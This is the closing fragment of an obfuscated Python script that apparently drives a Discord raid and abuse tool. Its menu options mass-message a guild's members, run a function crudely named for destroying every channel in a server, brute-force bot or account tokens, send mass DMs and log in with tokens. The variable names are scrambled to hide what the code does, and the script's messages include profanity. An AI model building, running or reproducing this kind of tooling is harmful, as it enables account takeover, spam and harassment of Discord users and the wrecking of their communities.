                                                except Exception as OOO00O00O0O0OOOO0 :#line:623
                                                    print (f'Error sending message to {OO0OOOO0OO000OOOO.name}#{OO0OOOO0OO000OOOO.discriminator}: {OOO00O00O0O0OOOO0}')#line:624
                                        await asyncio .sleep (6 )#line:625
                                    await OOOOO00O0O00O00OO .close ()#line:626
                                else :#line:627
                                    print (f'Guild ID {GUILD_ID} not found')#line:628
                            except Exception as OOO00O00O0O0OOOO0 :#line:629
                                print (f'Error: {OOO00O00O0O0OOOO0}')#line:630
                        @OOOOO00O0O00O00OO .event #line:633
                        async def O0000O00O0OO0OO00 ():#line:634
                            print ("Bot disconnected.")#line:635
                        OOOOO00O0O00O00OO .run (BOT_TOKEN )#line:637
                    except KeyboardInterrupt :#line:638
                        print ("\nSending messages stopped.")#line:639
                else :#line:640
                    print ("enter a message to send.")#line:641
            elif O0000OO00OOO00O00 =="5":#line:644
                while not BOT_TOKEN :#line:645
                    BOT_TOKEN =input ("bot token: ")#line:646
                while not GUILD_ID :#line:648
                    GUILD_ID =input ("server (guild): ")#line:649
                O0OO0O0O00O00OOO0 =input ("is this the right server (Y/N): ").strip ().lower ()#line:651
                clear ()#line:652
                if O0OO0O0O00O00OOO0 =="y":#line:653
                    RAPE_ALL_CHANNELS (BOT_TOKEN ,GUILD_ID )#line:654
                else :#line:655
                    print ("Channel raper off")#line:656
            elif O0000OO00OOO00O00 =="!":#line:658
                print ("fuck you")#line:659
                break #line:660
            elif O0000OO00OOO00O00 =="6":#line:661
                token_bruteforce ()#line:662
            elif O0000OO00OOO00O00 =="7":#line:663
                 massdm ()#line:664
            elif O0000OO00OOO00O00 =="8":#line:665
                tokenlogin ()#line:666
            else :#line:668
                print ("Invalid")#line:669
if __name__ =="__main__":#line:671
    main ()
